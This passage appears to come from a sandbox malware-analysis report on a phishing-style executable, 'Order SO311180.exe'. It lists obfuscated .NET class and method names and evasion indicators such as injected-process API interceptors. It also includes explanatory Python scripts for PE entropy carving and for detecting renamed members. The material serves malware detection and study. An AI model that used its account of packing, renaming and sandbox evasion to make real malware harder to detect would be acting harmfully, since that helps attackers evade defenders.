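    head += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102) + opt + table
    return head + b"\0" * (hdr - len(head)) + body


# Constructed samples: a .NET-style image whose .text is near-random (as the report's
# 7.957-bit section) next to a plain native image; DUMP mimics a memory region holding both.
RANDOMISH = b"".join(hashlib.sha256(i.to_bytes(2, "big")).digest() for i in range(128))
TEXT = b"The quick brown fox jumps over the lazy dog\n" * 12
PE_DOTNET = build_pe([(".text", 0x60000020, RANDOMISH), (".rdata", 0x40000040, TEXT)], dllchar=0x8540, dotnet=True)
PE_NATIVE = build_pe([(".text", 0x60000020, b"\xCC" * 512)], dllchar=0x0140)
DUMP = b"\0" * 100 + PE_DOTNET + b"junk MZ not a header" + PE_NATIVE

if __name__ == "__main__":
    for off, info in carve_pe(DUMP):
        print(f"PE at 0x{off:x}: .NET={info['is_dotnet']} {info['dll_characteristics']}")
        for s in info["sections"]:
            print(f"  {s['name']:8} {s['entropy']:.3f} bits/byte packed={s['packed']} {s['flags']}")
```

On real input call parse_pe(open(path, "rb").read()) or carve_pe() over a process memory dump. A near-8-bit .text inside a .NET image, as here, means the real code arrives through Assembly.Load(byte[]) at run time, so the productive next step is dumping the assemblies the CLR has loaded (the raw.unpack regions in this report) rather than reading the packed section.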
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
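The "High entropy of concatenated method names" lines above are a renaming-obfuscator heuristic: a class whose own methods are called B0GvUCRkvk, qRGv0AnIH2 and so on concatenates to a string with far more character entropy than hand-written identifiers, while overrides such as ToString, Dispose, Next and CanConvertFrom keep their real names because the runtime resolves them by name. The Uo.cs method named entirely from U+200B..U+206F zero-width and bidirectional code points (rendered _202A_202E_... above) is a second renaming trick the entropy test alone misses, since it uses very few distinct characters. The script below is an added example for this page, not sandbox code: the two obfuscated classes and the Uo.cs name are copied from the report, the clean LoginForm class, the framework-member list and the 4.8 bits/char threshold are assumptions.

```python
"""Obfuscator-renamed member detection, the check behind the report's 'High entropy of
concatenated method names' lines, plus a test for names made of invisible code points.
Added example, not sandbox code: the obfuscated classes are copied from the report, the clean
class, the framework-member list and the entropy threshold are assumptions."""
import math
import re
import unicodedata
from collections import Counter

# Overrides and interface members keep their real names under renaming obfuscators, so they
# would only dilute the measurement (the report lists 'ToString', 'Next', 'CanConvertFrom'...).
FRAMEWORK_MEMBERS = {"ToString", "Dispose", "Equals", "GetHashCode", "Finalize", "Next", "NextBytes",
                     "CanConvertFrom", "ConvertFrom", "ConvertTo", "ProcessDialogKey"}
ENTROPY_THRESHOLD = 4.8   # assumption: English identifiers concatenate to ~4.2 bits/char, random base-62 names to >5
ESCAPED_CODEPOINTS = re.compile(r"^(_[0-9A-Fa-f]{4})+$")   # decompiler rendering of unprintable names


def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def invisible_name(name: str) -> bool:
    """True for names built from Unicode format/control characters (bidi marks, zero-width
    joiners), whether raw or in the _XXXX escaped form decompilers print."""
    if ESCAPED_CODEPOINTS.match(name):
        name = "".join(chr(int(h, 16)) for h in name[1:].split("_"))
    return bool(name) and all(unicodedata.category(ch) in ("Cf", "Cc") for ch in name)


def score_class(method_names) -> dict:
    own = [m for m in method_names if m not in FRAMEWORK_MEMBERS]
    ent = shannon_entropy("".join(own))
    return {
        "own_methods": len(own),
        "entropy": round(ent, 3),
        # secondary signal: fraction of names carrying digits, rare in hand-written C#
        "digit_ratio": round(sum(bool(re.search(r"\d", m)) for m in own) / len(own), 2) if own else 0.0,
        "invisible": any(invisible_name(m) for m in own),
        "renamed": bool(own) and (ent >= ENTROPY_THRESHOLD or any(invisible_name(m) for m in own)),
    }


def flag_renamed_classes(classes: dict) -> list:
    """classes maps class name -> list of method names (e.g. exported from dnSpy/ILSpy)."""
    return sorted(name for name, methods in classes.items() if score_class(methods)["renamed"])


UO_METHOD = ("_202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A"
             "_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C"
             "_200C_200B_200C_202B_200D_202E_202E")
SAMPLE = {   # first three copied from the report's unpacked assembly, LoginForm constructed
    "VhQmoBhYwvJdMevmtt": ['B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR',
                           'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'],
    "Ahb4n3zGN97IU4WiQ4": ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl',
                           'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'],
    "Uo": [UO_METHOD],
    "LoginForm": ['ToString', 'Dispose', 'ValidateInput', 'SubmitButton_Click', 'LoadSettings', 'SaveSettings'],
}

if __name__ == "__main__":
    for cls, methods in SAMPLE.items():
        print(cls, score_class(methods))
    print("renamed:", flag_renamed_classes(SAMPLE))
```

Feed it a class-to-methods map exported from a decompiler and it returns the classes worth looking at first; on this report's data the three obfuscated classes are flagged and the clean one is not. Dropping framework members before measuring matters: the Ahb4n3zGN97IU4WiQ4 class keeps three TypeConverter overrides that would otherwise pull its entropy down.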
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX (42 identical entries)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Order SO311180.exe PID: 3392, type: MEMORYSTR
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: BA0000 memory reserve | memory write watch
